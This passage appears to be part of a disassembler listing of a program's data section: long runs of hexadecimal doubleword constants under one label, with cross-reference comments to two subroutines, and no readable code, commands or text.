		dd 0B04427D8h, 0B98C7C2Ch, 14953918h, 83523756h, 16B2BB4Eh
		dd 6FE5B5D5h, 0E501CCB3h, 5CB8FA5Ch, 0CDA8987Dh, 0F6E368D6h
		dd 9C3C4C12h, 0D96B587Ch, 5CBD0F07h, 8FFCBD0h, 0F2976F36h
		dd 0F9F8BF57h, 22C1F18Bh, 0DF283193h, 0DEA3C7BCh, 99CA7EE7h
		dd 0C3403A98h, 9A5F9AC4h, 4C96A994h, 5723B3FDh,	0CF178D6Eh
		dd 0EF5CB308h, 98854B45h, 45FFA3BDh, 16AF5601h,	74E51AD2h
		dd 0C1E4CCA4h, 0A64D3611h, 0FABF415Fh, 4C187452h, 377EDA84h
		dd 75AD6E7Bh, 0BC7FA04Dh, 0AF5B574Eh, 0AF5AA693h, 7EA987E1h
		dd 3A972559h, 0A5D6C5F8h, 992BF613h, 1159DF77h,	0C42147D7h
		dd 32E6E8AFh, 559089A5h, 9A9F14B2h, 37218E04h, 65707BAEh
		dd 15277FD8h, 37226DECh, 0F409628Bh, 0A0AC69B6h, 0AB411676h
		dd 0A9D13773h, 0E67DE195h, 0D8F84B29h, 10E16EBBh, 0D0169646h
		dd 37119A98h, 6E90FA25h, 75980590h, 9F7AC66Ah, 301F50D6h
		dd 10F65456h, 73009E3Dh, 0BC94424Bh, 91EC8FFAh,	0FBC9190h
		dd 0ED1FD477h, 4887A82Eh, 4CDC9D04h, 0A67D6577h, 0FCB88FCCh
		dd 0E0212A92h, 8B17A09h, 0D05CA71Eh, 0A596DE53h, 9EAD22B9h
		dd 40D76BC2h, 0A553C8DEh, 0BAB8E5CAh, 8BCF54E4h, 0BC9A1E35h
		dd 4EE20CC1h, 0B7DCD478h, 0D62375C4h, 0C8A49972h, 0A21D53BAh
		dd 946B72E0h, 0E6282B5Fh, 0A47774D5h, 0B6D0FF04h, 0ED03E3h
		dd 2D1D63D4h, 91D6BC55h, 33856BD7h, 0B1AFA022h,	0A44B2E5Ah
		dd 6155A8AFh, 0CB15402h, 90ECA18Fh, 3DF0575h, 2BBB440Fh
		dd 0A9E5DA66h, 192F02FDh, 6CACF2DFh, 3595EEA1h,	4363DD31h
		dd 0BD4555C2h, 0D1C0970Eh, 53FCE703h, 18704DFFh, 135F3F7Ch
		dd 95FF85EDh, 0F57637A0h, 0D91A2F62h, 7C3D6CF4h, 499B38Bh
		dd 0C6FE704Ch, 90FC55CDh, 8C1DFDEDh, 581F46B6h,	37F37512h
		dd 6C12CC83h, 4925D981h, 0DE2B62D6h, 0CAB4E9B9h, 9D60FC3Eh
		dd 0A0D96511h, 99457D46h, 60F80EBAh, 5FEA2E70h,	71577050h
		dd 432216D6h, 0D11F4FDAh, 0C2E67770h, 0C92CEF26h, 0AAFB3CE0h
		dd 0B6AD7BDEh, 5863B70Bh, 357F57B4h, 0F6EAB0FDh, 0ABFE03EFh
		dd 8C2EAA61h, 8AF69D52h, 0B88CA844h, 63654007h,	0D97F7296h
		dd 953A165Dh, 193806CFh, 0F635DEB5h, 0A22BA37Bh, 69DE6CE5h
		dd 4B6614BAh, 925FF9BEh, 65A65A62h, 2846C2BEh, 0F90F0FFDh
		dd 4BD1B447h, 3F2ED849h, 22B7E078h, 764F6F02h, 0BD5A2B71h
		dd 0ACD4ADCAh, 0E03377EBh, 98EB9687h, 0D3252FB7h, 6F6C425Fh
		dd 5CF8555Ch, 515746C6h, 5B751C8Ah, 4A9EC3E9h, 658BC15Ah
		dd 69B41DCAh, 4A75ED34h, 0FFAFBF82h, 162C13ADh,	965F5006h
		dd 0E8C8AF83h, 35F7ED99h, 0EF6A64F0h, 0E8363B0Fh, 5BD46185h
		dd 9056126Fh, 1909E272h, 0C71ED637h, 0E57EC2FEh, 0BBB10B2Dh
		dd 0C9DD2DBBh, 0B5A24D97h, 904218AAh, 0ED8A85D4h, 618EC5D3h
		dd 87E9D4E2h, 1413A8BCh, 7C475255h, 8AF62F6Ch, 998D4C2Dh
		dd 8744B930h, 0C12BA607h, 0F4848E1Fh, 671392CDh, 0C7D4A80Ch
		dd 0F6873612h, 6BFC90EFh, 0BEE0CE0Fh, 0ABA6D398h, 0C7700ADBh
		dd 0AB23BB9h, 8AB4E932h, 9681ED7Fh, 9B891DDEh, 0AD82ED13h
		dd 96B795AFh, 1C508732h, 6D475FB8h, 251764CCh, 0EA922ED1h
		dd 43A14A72h, 2595D0DEh, 8F3E6BEBh, 0D58D6518h,	813B6B61h
		dd 2D21BBA9h, 76510755h, 838DCE0Dh, 81F22B9Ch, 712B16C9h
		dd 6C47FD6Ch, 9D3FA97Fh, 42B6999Ah, 0B181C295h,	1DBDD1CCh
		dd 55DC015Eh, 49DD04E4h, 796EEA89h, 7ED4B4F0h, 9869DCF6h
		dd 52F2EB52h, 0DF99C702h, 295FF9F0h, 122455ACh,	18E9CD40h
		dd 0C100DBFh, 67D89E74h, 0BC5F7A90h, 0BCB79527h, 0C3C5B79Ah
		dd 9DF5B59Dh, 5629DA4Ch, 0DE0A1114h, 9C92731h, 8FF512F6h
		dd 19D832Bh, 0A17A3DD8h, 48D27C24h, 36769AADh, 0BB7FBE6Ch
		dd 6125E615h, 968878F1h, 77144E58h, 0F9D3BC49h,	5651DA80h
		dd 9AB55D80h, 79EC8E0Ch, 2B2C3D5Ch, 43BB8DF9h, 539C2D0Bh
		dd 3B868548h, 0B6D17309h
		dd 0DF44BF42h, 0FCECFFAh, 0E14B0365h, 0F285C607h, 0DACDE9E3h
		dd 0A9F2F81Fh, 8C52EB64h, 0D6AD940Dh, 0AEA352AFh, 0BCE2F295h
		dd 0C0E135FAh, 0AAB8359Fh, 47D6A7C4h, 147CBF7Bh, 1FC38C8Eh
		dd 269EBFDBh, 0E85FD118h, 0ACCE8247h, 56B33DD2h, 0E2AF03EDh
		dd 4495D6Bh, 0C2C733FDh, 0DC862C22h, 3EEFA2BDh,	2745EEB0h
		dd 0B268A4A6h, 0A81C2FCEh, 2D0EAAF8h, 0E2F0D5D2h, 0DBE3F4EFh
		dd 56DDE57h, 0D406898Bh, 4539E08h, 144DD9FDh, 0C36901CDh
		dd 2C703AAh, 8D7F19D7h,	0E358DE1Ah, 0A57A969Ah,	0E05CF118h
		dd 0CFF6729Ch, 0A4ACCFA6h, 7B45759Dh, 5F64F895h, 447F6E18h
		dd 0A217AFD8h, 0B1BACBDAh, 2471FFC5h, 0B1ECC09Dh, 5A24DFC0h
		dd 74355CA9h, 9D691233h, 0B44BB7E8h, 0FD555052h, 46F83118h
		dd 55CE61F3h, 0CAF341A4h, 5D8E509Eh, 75908738h,	0F3AFE535h
		dd 8DC4CABDh, 0C5308C1Fh, 19667E8Fh, 0BC920C36h, 85FE07C7h
		dd 12EDFAFEh, 0EBF8F078h, 2CDAB271h, 80CDB980h,	0B91477AAh
		dd 0D587A9A0h, 0F29E82F9h, 0AB2FFA9Fh, 726AC6E9h, 10A2ADB1h
		dd 79DD336Ah, 0BF067C77h, 0B105F684h, 298D755Ch, 0E07392FBh
		dd 5AF8593Fh, 0E70ACE08h, 472A7E0Bh, 42F02CBh, 7179C144h
		dd 64A03483h, 0A6BAA5C5h, 88A25343h, 0CF0B8D0Dh, 0B77B9D77h
		dd 55F1C809h, 0FD6003B2h, 0F9BBE1C2h, 5A266B40h, 64FDA53Eh
		dd 793A73BEh, 86BBB365h, 159CD5Ah, 2508539h, 0EC2CA48Dh
		dd 0A5F89F14h, 6D3F497Dh, 409475A2h, 0CAB0915Dh, 315274FAh
		dd 8A9F26C3h, 61E235E4h, 566266F8h, 114C1095h, 0B58F20BAh
		dd 4AE0B45Bh, 984E4526h, 331DA9FBh, 0EA7B8A27h,	33A0444Eh
		dd 8419AB40h, 94FF28Eh,	0CBFE6393h, 3A9B9BDBh, 6C7833D0h
		dd 1F89A837h, 0C0F530FCh, 0AAE573B0h, 520DE13Ch, 0EFECD6D0h
		dd 0F5F17788h, 4F21DA02h, 0AED239CFh, 0A702F88Bh, 52C502AEh
		dd 15BB5A3Bh, 0FA57915Bh, 1A985080h, 1C34A917h,	0D53FD4CDh
		dd 1E02B679h, 0DAA88985h, 21908952h, 53E72A68h,	0E58625E9h
		dd 0FB843F98h, 37CF93C5h, 0E022E283h, 7A75A087h, 0E55DB567h
		dd 5D923714h, 12533009h, 24D182AEh, 1259CC38h, 50EF37AEh
		dd 0FC0DFD08h, 85A2E8D0h, 1AE2F304h, 0FEF9F3Eh,	5E0D5E37h
		dd 37D2F6ADh, 0AF4DA112h, 554CD2C7h, 180225C1h,	5D66497h
		dd 5053C8BEh, 0A7D4A66Ch, 6D017CF4h, 91C13C09h,	0F9C14385h
		dd 715C7C72h, 0CDC27184h, 4854A2A2h, 0CDD6616Eh, 0BE31ED13h
		dd 7419A670h, 0F3D0942Eh, 0F20D5992h, 0B4E9236Ah, 405D5CF2h
		dd 0E7F845A3h, 63E5D47Ch, 0C4B7E0D6h, 0DD8CB836h, 9961799Fh
		dd 0C4712868h, 29557696h, 0FEF62EFAh, 6B3D108Ch, 2435179Bh
		dd 0EF64EC7Fh, 9F5F744Fh, 387B962Fh, 0D6DD98F0h, 0C967891Dh
		dd 14AD2719h, 3149B683h, 0E7AFAABDh, 16B07452h,	7836ADCDh
		dd 97C1ED3Fh, 18401FEAh, 4C0F5F86h, 82E76356h, 398FF76Dh
		dd 8AA4FA20h, 0B1E70E74h, 3CD031A2h, 0EF1949Bh,	428D5A15h
		dd 0B335C1E3h, 6DE0143Fh, 347FFBB4h, 0C1F5EA6Bh, 5F5DBEA0h
		dd 8DE1D821h, 0F5BAE47Eh, 915D91B5h, 7AE2F2BAh,	51FE68DBh
		dd 6F02D810h, 0A1A24497h, 2F3F83E7h, 2C2F4332h,	0E551DBACh
		dd 3ED28581h, 672F78DDh, 17F98327h, 7BBB24BDh, 9185D2Ah
		dd 5D03E25Fh, 0C539941Eh, 4B775A4Bh, 570C8D2Fh,	0A57F4ADBh
		dd 40DFB643h, 0B294E99Fh, 0F64ABF91h, 0E7E12B8Ch, 657878BFh
		dd 0AEECFDEFh, 47AA3C78h, 46EA96BAh, 0EBFF14DCh, 0D73E1F8Fh
		dd 0A7F04081h, 11313E5h, 2ABC42ADh, 0CDC5E581h,	0FDA2229Fh
		dd 0A459E159h, 92CEFA3h, 0ED864273h, 3AD822D5h,	8D5ED7DAh
		dd 95FE2A4Dh, 0B72A863Fh, 0ADE47943h, 244FAA9Ch, 2746F804h
		dd 202BD14Ah, 2781DCEBh, 0F1B655A6h, 22A981F0h,	0E8D5D0F8h
		dd 0B927777h, 0FC299775h, 0FB281342h, 0FB158C76h, 865116BEh
		dd 283F6923h, 6870DD43h, 0DDDC63CDh, 19DC34BBh,	0D76F4CF9h
		dd 352A1611h, 0A592704Dh, 0C1EFEA25h, 0BC9238A6h, 0D968D92Bh
		dd 0B25D8ACCh, 0D1D83113h, 57A7C7F3h, 0AD4983F4h, 73966A56h
		dd 26533249h, 0CCEE0B26h, 88E65B07h, 595BEBE7h,	1DA1BE7Bh
		dd 9E8F8C3Fh, 219FF588h, 0E8EA00A6h, 55E8C542h,	346EDBADh
		dd 0AD9B2A86h, 0AD13D4D9h, 4F8EF7D4h, 8753DFB5h, 9CA8AE83h
		dd 0F752C59Dh, 3E880C47h, 7876F310h, 91D4EF2h, 182850Eh
		dd 64BC5ADBh, 3A4CBFE3h, 8CCABE93h, 63603F05h, 3AF0B46Eh
		dd 798BBAA8h, 277AC753h, 0D308EE4Fh, 0FB6D162Dh, 3A168A27h
		dd 81F39638h, 0BECB002Ch, 3F9ADE14h, 9A1F6DD2h,	5C5ABF0Bh
		dd 10C7C1BCh, 0FACC21A2h, 9F565A5Ah, 8EAFB864h,	4D538EA6h
		dd 5682920h, 2424AB83h,	0CD45F263h, 0BBDED5B6h,	619D33EAh
		dd 32B164Eh, 1C3A5D7Bh,	5006368Eh, 0D2729FC5h, 26352907h
		dd 0CC6E1551h, 12F8FACAh, 88F98A20h, 58DDC65Ah,	679F8A9Ah
		dd 8E05A0ACh, 7DAAD508h, 5E337B5Bh, 30B017FCh, 0B4E1303Ch
		dd 282495D5h, 8D697BDDh, 271CD6CCh, 0EC6B5581h,	0B82287AAh
		dd 7DC75DA7h, 4B856FB4h, 5BA4B27h, 83C7D5EDh, 0F6EA7F1Bh
		dd 0A5087529h, 0F90B342h, 87BEEE84h, 65A8AA8Ah,	168828DAh
		dd 4FB702A2h, 0E787CFFAh, 6D82195Fh, 8EC239F2h,	6E7AC1EFh
		dd 0BD2D8237h, 0A3451F8Ch, 626F063Eh, 0BD94D8A6h, 0D6798EE0h
		dd 0DBED96A9h, 0BB901F85h, 0B2FA889Dh
dword_474244	dd 0B1D617F7h, 135A8FF7h, 68B3402Dh, 0DE5B5E0Bh, 0C065F1E1h
					; DATA XREF: sub_43F227:loc_44A96Eo
					; sub_43A839+1727Eo
		dd 5FE4E6D5h, 0EF21CCEEh, 5AE0A097h, 0F68A2B2Fh, 7C61F222h
		dd 0B8785E4Dh, 0B51E4F0Fh, 0AECD2EB8h, 137429D3h, 7D34B706h
		dd 0B665F7CCh, 0BC20CF3Dh, 35B51B80h, 0A7CD73F1h, 95DA538Ah
		dd 368A96B9h, 6876092Ah, 579FBC0Fh, 20D3B32Bh, 23E35B93h
		dd 0B4394BB6h, 0E06CC2B3h, 39234E56h, 0F447DF77h, 7ABD313Fh
		dd 0A8AAAD40h, 0BD5DBA9Bh, 0B62E8386h, 85DC6474h, 9A809074h
		dd 0C7B31133h, 4FEC43F9h, 8993A3B4h, 8DA5063Eh,	0BA94779Fh
		dd 0C209E7AAh, 2DC3AD60h, 977ABE0Ah, 0D4896FF3h, 1FAC8ED9h
		dd 225F3F9Ah, 0CB02A4BFh, 0E1A3EBC9h, 0B70F829Bh, 0C5F5BBCAh
		dd 0FAD94F0Fh, 4FF4FB8Dh, 40DF1B7Ch, 886FA76Ah,	317AD02Ch
		dd 0A21E8126h, 0FD61C597h, 83BA86D1h, 12EE07C9h, 41A1A6BAh
		dd 2DE56E9Ch, 0D0AA3590h, 6D4A5B57h, 7F10ABE2h,	0CB45FCE7h
		dd 0AD625736h, 83FF9ADCh, 0BCEA9C2Fh, 0D7CC424Eh, 0A92AA7FBh
		dd 2D957D5Bh, 0EE7C1B1Eh, 47D233A7h, 7359764Bh,	0B1EE219h
		dd 99C52E36h, 0FB0026ACh, 5E9E776Ah, 0C1C2E2FFh, 0BF6F7B06h
		dd 0BC58AB77h, 0D7D7728Bh, 6C7A8DA0h, 73355C18h, 8AC4C263h
		dd 58DA04D2h, 0CFB9FF7Dh, 0BFA5C2D6h, 5BDED034h, 0ACC129C0h
		dd 0CC5EC680h, 35495728h, 0EF58EDDCh, 831CF3B8h, 1551FE56h
		dd 457E9DA4h, 30AF8C1h,	1D13F845h, 6565A573h, 2831071Bh
		dd 0EDE80FF7h, 0ADECA5ABh, 12C85537h, 8D02D21Eh, 6AF296EBh
		dd 6BA5E9A1h, 9F51F6A0h, 8D64D12Ah, 6737362Ah, 521B5C49h
		dd 0A276A51Ah, 0BECE4080h, 9FCAF470h, 4A6A079Fh, 71F15355h
		dd 94F3518Eh, 5929B687h, 0B1A74A01h, 8C52A5DAh,	4791B05h
		dd 14FF54D2h, 0A9B657CCh, 0D0141BC8h, 178641B1h, 33F34C7Dh
		dd 8EA5BAC7h, 0E1160B98h, 0AB04845Bh, 1E1A8ACAh, 0F8FB8B26h
		dd 5F15FF3Ah, 860F8184h, 68C4A0DAh, 0FCE7CA3Bh,	0D40A4136h
		dd 6A03BAC8h, 9866FF74h, 3065B4Ch, 1F1FD6D9h, 23381950h
		dd 756AEFAAh, 716231D7h, 9D564CEAh, 0A966DC6Dh,	191C6BA2h
		dd 0B6617917h, 644FD8E0h, 0D6D66B79h, 0D67BEFDDh, 4F8D4AD0h
		dd 0E147E601h, 0D8813B81h, 6B4FFA5Dh, 97E57F15h, 0F08BA981h
		dd 6BFB68F9h, 0EE7A3824h, 783A33B7h, 7ECDD7FCh,	9FEC554Ah
		dd 568BB95Ch, 8D4EC95h,	0B8FBA593h, 40A33716h, 2B557E7Eh
		dd 0F6D6ACD2h, 0BB400AEDh, 0D90A8886h, 1975AF66h, 425EDC3Fh
		dd 79A5EDDh, 5CA90A2Fh,	0A9D3BCF1h, 62280229h, 0F9068EFEh
		dd 0D9AE2D4Bh, 92D4D8B7h, 57DC5094h, 49D70D71h,	987E5695h
		dd 0AB85299Ah, 93CD2B5Eh, 0B9370607h, 0CB5AAD15h, 0A3A5C990h
		dd 8E27BD83h, 1726BE83h, 895CF4AAh, 7875D68Ah, 3208E7E0h
		dd 0DFCE3BE6h, 0D3CEA8AAh, 0D6EF084Ah, 0B3B4014Ch, 4FD78139h
		dd 664C5126h, 56913524h, 0F8F4C341h, 44EC88C0h,	9DFABE08h
		dd 32E7332Dh, 1A5A1F99h, 5DE39B55h, 391031E8h, 0A2253334h
		dd 0ECDE3EC5h, 5FD944F3h, 0BC0AD82Ah, 0BB9F36C5h, 0A1F5FC3Ah
		dd 2E6207DFh, 0FC5258Dh, 4E844A97h, 2CD4E3B9h, 1D8C82A5h
		dd 0FB08AC3Ah, 642F8B6Fh, 0BAA8B645h, 9CA78988h, 96A6029Ch
		dd 37C12EDAh, 10D92190h, 90C72EBEh, 27FAA99Ah, 0C0FB80A2h
		dd 0ABDEB38Fh, 1F3DE51Bh, 9775DCBFh, 3B763EE8h,	9CCE7B21h
		dd 2D1EBB46h, 87E9CE64h, 0CB6F3C6Eh, 0EB79EF2Fh, 0EE663292h
		dd 0F669D9Bh, 0F0C6F830h, 5E1C5E80h, 5DDDC4D5h,	0AECD4A46h
		dd 15853EC8h, 96AC7746h, 1588F753h, 0EA65F0EDh,	7FF68AE6h
		dd 0A02D2E38h, 0F0D72E66h, 0EAEF50F3h, 0B4D2FCFAh, 0B3BEB1C4h
		dd 0DA6EF700h, 0E158BBA5h, 0FDE396Bh, 0F7ECD2A4h, 68EE0B0Ah
		dd 0BFD720Bh, 0D85EEC4h, 3E1D538Bh, 0D5B37CCEh,	36024DFCh
		dd 50106B98h, 2B5E6B16h, 0F974E3F2h, 5C3D5A42h,	551BD985h
		dd 0D843BF2h, 0CA56C506h, 0EDCCCFFBh, 3D000B6Ch, 0DE234A30h
		dd 0D97FB9F5h, 216E39FCh, 0EFBFDF3Ah, 44E6FF02h, 0A56EA8F0h
		dd 9F8DCDD3h, 37223DBCh, 0CB5231D9h, 51A70BE0h,	7AC9F481h
		dd 0C209F1C0h, 1F9A5E33h, 0C4CBD057h, 0A3FCABB4h, 0EF5BE67Eh
		dd 0BB25B02Dh, 5D29C316h, 587C1155h, 78BF1AB5h,	0B54420AEh
		dd 5F6082C4h, 65D51267h, 0AA1B99A5h, 59D9A9A5h,	292DD34h
		dd 0CA5BAB7Bh, 9F74528Ch, 0EF6BA165h, 0B05FCE4Fh, 0E600DC07h
		dd 41D28287h, 2D85CE29h, 2C0294D7h, 68B3C5BAh, 21AA4DD0h
		dd 35B7466Fh, 0ACBB0B1Dh, 5A250F1Eh, 5268AD4Dh,	1F8B4554h
		dd 0C5915E26h, 0A1CAC57Ah, 0DBA25699h, 1DEE5517h, 0DBECEEDh
		dd 4DF346F9h, 72DB8BA6h, 8C3D7741h, 3DE7C108h, 0DEFBD403h
		dd 43323154h, 0FC256534h, 2A137A34h, 0E4A271BEh, 84D0655Fh
		dd 1E715Bh, 4DD62D8Bh, 0B9D38296h, 0A2AF78Fh, 0FD60712Dh
		dd 8EDF6721h, 0AF8C98F5h, 0A9D76DCEh, 0E4E8A5C6h, 2E958F17h
		dd 0D468E191h, 0DD54A209h, 82BC26DBh, 0C8CA3AEEh, 0C1A71090h
		dd 0AB5677F7h, 9AD2502Ah, 3756EBD5h, 9C85AA4Ch,	7C9E5CEFh
		dd 1CFA245h, 0D1B6CC76h, 57AF55h, 4BB1A1E2h, 1B4559CBh
		dd 0C553150Ah, 0F1BECF6Dh, 0E712C4C0h, 0E5D6F91Ah, 0AA4146AAh
		dd 9A374C2Bh, 0F71D174Ch, 42FE7FEAh, 11D337A8h,	84A66BBFh
		dd 47A10D3Ah, 0CA7C07CBh, 4D773B1h, 0CFAA9F3Eh,	0E30B005Fh
		dd 8F0CF37Fh, 0E7890997h, 0DCF3797Ch, 8DFE1651h, 0E03D7C10h
		dd 9675A57Dh, 5A5BA0C3h, 0F949B7AFh, 8D7B6EE0h,	0B179DF0Bh
		dd 5DFE078h, 5D736227h,	0B215BC7Fh, 0FAB598CBh,	0D7D3748h
		dd 4D5D40Fh, 0CB231569h, 6FD0F541h, 0BEF720EAh,	289999F4h
		dd 0E0BE5FC0h, 0DE75A219h, 9F05ADEAh, 0FAFBCCE2h, 0B5574227h
		dd 57B7ABD3h, 0FC57BB59h, 0DAF193FBh, 0DAD613EDh, 0F5C2C5ECh
		dd 0DBC995DEh, 0CF735A29h, 0EC622D68h, 7CD7A862h, 0D5A4C7Ah
		dd 0A29AA527h, 0ADA9B88Ch, 0C73AE5B2h, 5503BC57h, 0B0E65153h
		dd 1CBC71C2h, 0E5DC2FBAh, 74B4EC02h, 0FCBDA266h, 0F0176212h
		dd 63D875A3h, 9C71942Dh, 0E85F67CEh, 234C1323h,	0B0A4B40Eh
		dd 0E8A2B5BEh, 0BFECB120h, 10C67A38h, 51B4A75Dh, 0F6A77677h
		dd 717952B5h, 512C614Bh, 37B60452h, 3AF5B3BBh, 0CA31F3DBh
		dd 82AE0364h, 0DDABA9Bh, 5B5A1FB6h, 0F1EABC8Ah,	0D8984014h
		dd 7798F5Ah, 0B0891F08h, 513EB431h, 8D32EF1Ch, 5AEA7E19h
		dd 9DC32D1Bh, 0ABC486E3h, 0B5F826ADh, 18530C12h, 98B06ACBh
		dd 2C6992E2h, 7CFECB73h, 0E454DFE9h, 0F8D7A568h, 52CBE68Bh
		dd 15F76870h, 0CA05217Eh, 72EEDD06h, 76378C93h,	0F2EBB342h
		dd 81F7D11Eh, 0CAAD89C9h, 0C9F4D988h, 5678C0DBh, 0E25F2868h
		dd 87076285h, 0A962A72Ah, 4DF6810Eh, 330AD46Dh,	54BA5DD5h
		dd 92B6C553h, 4A4E02B6h, 447DD635h, 0A5C8564Bh,	0EEA14B76h
		dd 0CE4CDDFCh, 0C348F898h, 0DC838BBEh, 52B5B561h, 0BA3D2AA8h
		dd 80BB7B68h, 0A001A786h, 75DDD7C8h, 37D54988h,	0D4481ABh
		dd 4EC30C3Dh, 454256BDh, 0C5CDF3DBh, 2AA237F0h,	0EC52C1A7h
		dd 539AF98Ah, 0C5D1DCDh, 0B460E5EDh, 0A32AFAA2h, 7EFDCDF5h
		dd 0BE7C9264h, 0DF95433Ch, 42166723h, 2896EDC4h, 93F774BFh
		dd 5552E820h, 6B1FB418h, 6C4F128Fh, 0EF7FFC04h,	55E20B47h
		dd 42A7BBCCh, 7614C30Bh, 30EA06FDh, 4152092Bh, 0FDCD5D41h
		dd 0AB1CC7A5h, 557A569Eh, 0D8353258h, 5BD8A698h, 0F9722BEAh
		dd 3E334865h, 8F481D24h, 34809813h, 0AA6BB797h,	532944C8h
		dd 0A57EA49Ah, 3B0C002Bh
		dd 0E101A0BEh, 5E9C1DF7h, 14F21A5Bh, 0FEA6136Dh, 73A777ABh
		dd 0D7A426BAh, 0E55B22CBh, 0A428BF8Ah, 0EAF395CEh, 0FF757449h
		dd 5909B119h, 0F00F2AA0h, 0DBAABAD0h, 23BDB8C5h, 397627B7h
		dd 0DA075722h, 0D6AC82B7h, 0AEA0346Fh, 530F1E68h, 3E6B1C72h
		dd 0F338C37Fh, 91A2791Eh, 66C08BB7h, 5E6F9B3Bh,	1D71F3F4h
		dd 0FC638BEDh, 0D09FBF8Fh, 7AD02B76h, 49A86A5Dh, 1AE05C75h
		dd 3D566772h, 94AAF875h, 340515CAh, 8BBEF339h, 0AB421B8Eh
		dd 85C5D889h, 0F9D12EBh, 74651723h, 3423B70Ah, 92F01C1Eh
		dd 0B2FE03F6h, 261DADD2h, 0EE8D6BADh, 0DA12282Fh, 7F8A6825h
		dd 0D2D5FC69h, 187ED659h, 2E5FB91Bh, 0BBEA0ABDh, 0CADF96CEh
		dd 0FFC35018h, 0A4BE648Ah, 2BB09D53h, 9AFAA483h, 9F05F84Ah
		dd 79A9DEADh, 0AC5A8E46h, 0D3509A43h, 0A68D06ADh, 0D53A9B01h
		dd 64AA47E3h, 0FCB6D8D2h, 5FF53C18h, 6B142A44h,	0B52FD1C4h
		dd 7940B348h, 0A1C90ABCh, 0FDA2F98Bh, 95F8E786h, 2677AB53h
		dd 0A189DC82h, 5EB093FCh, 0FB81D61Eh, 5F118155h, 4F730AE8h
		dd 0C6F0B202h, 7A36B0Fh, 0E2413583h, 0E01D7236h, 386DB0BDh
		dd 50CAEE7Ch, 91F88E44h, 0B46FC4B8h, 4A9919A5h,	2962AA0Ah
		dd 0C3B2AE66h, 0F733A29Bh, 9CE344C2h, 46FB0950h, 0AC43DA29h
		dd 0C366DE7Ah, 3388AFFh, 890C7F24h, 0DFF81BA4h,	12C569DEh
		dd 6E1D212Dh, 5715DC75h, 0BE9020DEh, 0AB8C0E99h, 41966415h
		dd 0C6FCC6DEh, 371043FFh, 0A2AF73C4h, 0F844AE8Bh, 0AC3A8DC3h
		dd 86628AB8h, 55DEE944h, 86EA2AA9h, 0AC5F3D1Eh,	93DA8582h
		dd 2A6A405Fh, 7A0A8EF8h, 0B2A15891h, 0C261AB5Fh, 7AAA6993h
		dd 45A2FB28h, 522D33EDh, 81FC05CFh, 102DA35Dh, 0D38CE6C4h
		dd 0D079CEA9h, 8F7EFA08h, 849A4A21h, 0A2B4593Fh, 8971B885h
		dd 0A5245425h, 0F1AA3540h, 35A2876Ah, 0C9C0FB67h, 0B2964763h
		dd 40645FE5h, 0BE7B49AAh, 0C56CC66Bh, 73B8612Dh, 0A2657747h
		dd 0B2DB4CF5h, 8C9C4616h, 0BF213509h, 25017D74h, 848590B8h
		dd 6BE6DAE4h, 0ED26E61Eh, 0B5F577BAh, 80D7C386h, 0C1E51599h
		dd 0D70D3FA1h, 0C1052A5Dh, 249B8E07h, 0BF1B8FFAh, 0D471EEBEh
		dd 61DADFC1h, 91197CE5h, 5F810510h, 34C9091Dh, 0F93BBD0Ah
		dd 0C1D74E76h, 0F87DA7A1h, 0D659A103h, 0F301DA44h, 0C22138E0h
		dd 0E6C2C82Ah, 56B06FC4h, 0A7215FE4h, 1EBE4EB2h, 7DE24383h
		dd 0EA872988h, 0BDD73498h, 0A1528627h, 0C7BF902Eh, 89C74326h
		dd 0FCDDD8B9h, 0B109FBF6h, 7587DF74h, 4B246863h, 40565611h
		dd 39B9D63Bh, 7A3D4E20h, 0E7260818h, 180B3A98h,	2FE11D9Ah
		dd 4191452Fh, 0FAE4DDBEh, 5E7FEAF4h, 864D5FF0h,	33F559F7h
		dd 0BA1A9329h, 0FBDA7DF8h, 747A4F99h, 0D32698E6h, 1BC80574h
		dd 2A7D7C03h, 501982E4h, 15CBEE15h, 48FC8BF7h, 0E0A4C307h
		dd 73251587h, 3660D305h, 0C2DB17F6h, 0F6C71A1h,	0BABBC938h
		dd 0DBC358FDh, 0AECB8A58h, 0C6F6D24Ch, 0C0F437C3h, 0BD8F2D4Ch
		dd 8CCAE252h, 0B0EFE61Fh, 89E2E581h, 7C15C7DBh,	6881E9A0h
		dd 84B45CCCh, 0F1452560h, 0D7426EACh, 0AF53F83Eh, 3DFE4663h
		dd 179456D1h, 0F5FDD937h, 5F2BA6D1h, 2D5ACE56h,	0DC701335h
		dd 9A9B656Ah, 575F79F8h, 26BCCFA9h, 0D6D72F3h, 7B8DD7FFh
		dd 0DB90C75Fh, 4924DCD5h, 564BD02Bh, 0BDD37216h, 0C9A29475h
		dd 3E4A0174h, 0F9BC9FDFh, 0D76EAEA1h, 3D5FB647h, 0CDD85B19h
		dd 22021707h, 22AA9733h, 3595B598h, 2529B25Ah, 0A7AB32E6h
		dd 111A953Bh, 0E8AD7079h, 298CB83Eh, 0FD4072B5h, 0FF606791h
		dd 0FDBD4CFh, 0D1687DECh, 36FA6908h, 3DA2C0D6h,	11BCB371h
		dd 9553D4DEh, 0D7CE191Dh, 53AE163Fh, 0AACB81Ah,	875F1878h
		dd 2DD47ED8h, 38CA1DD3h, 44AD7951h, 52AAA1Ch, 69F49F17h
		dd 9C64F137h, 0EBB2C5BAh, 94004EC6h, 55F3D276h,	0E6E43913h
		dd 82B3159Dh, 6DC109ECh, 0D443B36Ch, 15D0CB84h,	0BD8DF137h
		dd 0BAB6D09Dh, 0B0DF1E82h, 0FDB94268h, 0C1756F33h, 0F6D4024Eh
		dd 0ED92C7E6h, 0FA8C0CAEh, 4C04DCA9h, 80AC28BAh, 0FF4EA8BFh
		dd 4FD4FCFBh, 99BBDE76h, 36F13915h, 42A167B7h, 0E2EFC3B4h
		dd 5A0E1AC9h, 5F8C1794h, 4B6CA640h, 3091574Bh, 3CED3CDh
		dd 14999286h, 354DC744h, 0AC57599Ah, 41437046h,	57F67861h
		dd 904CF0C7h, 771BC7B2h, 7A805F5Fh, 0C89DC3DDh,	0EF03F362h
		dd 6F3BF980h, 5B6D6785h, 9FB95796h, 0F6973DB1h,	0DEBEEFECh
		dd 2F72E602h, 218D61AFh, 992DA3FDh, 0C915282Ah,	1CBE2BCDh
		dd 58801D8Fh, 0AE752DDEh, 9A59E3CFh, 0B8B61E8Ah, 71A69B31h
		dd 73AE7E35h, 0B4BCAC26h, 0B17DADB6h, 1395F967h, 21635D4h
		dd 0C0FC5BBDh, 3CAC7DC8h, 2A41B896h, 425494BFh,	31CDC6F1h
		dd 522ED32Eh, 0D3CF2FE0h, 4680B411h, 70CCAC44h,	0E5537739h
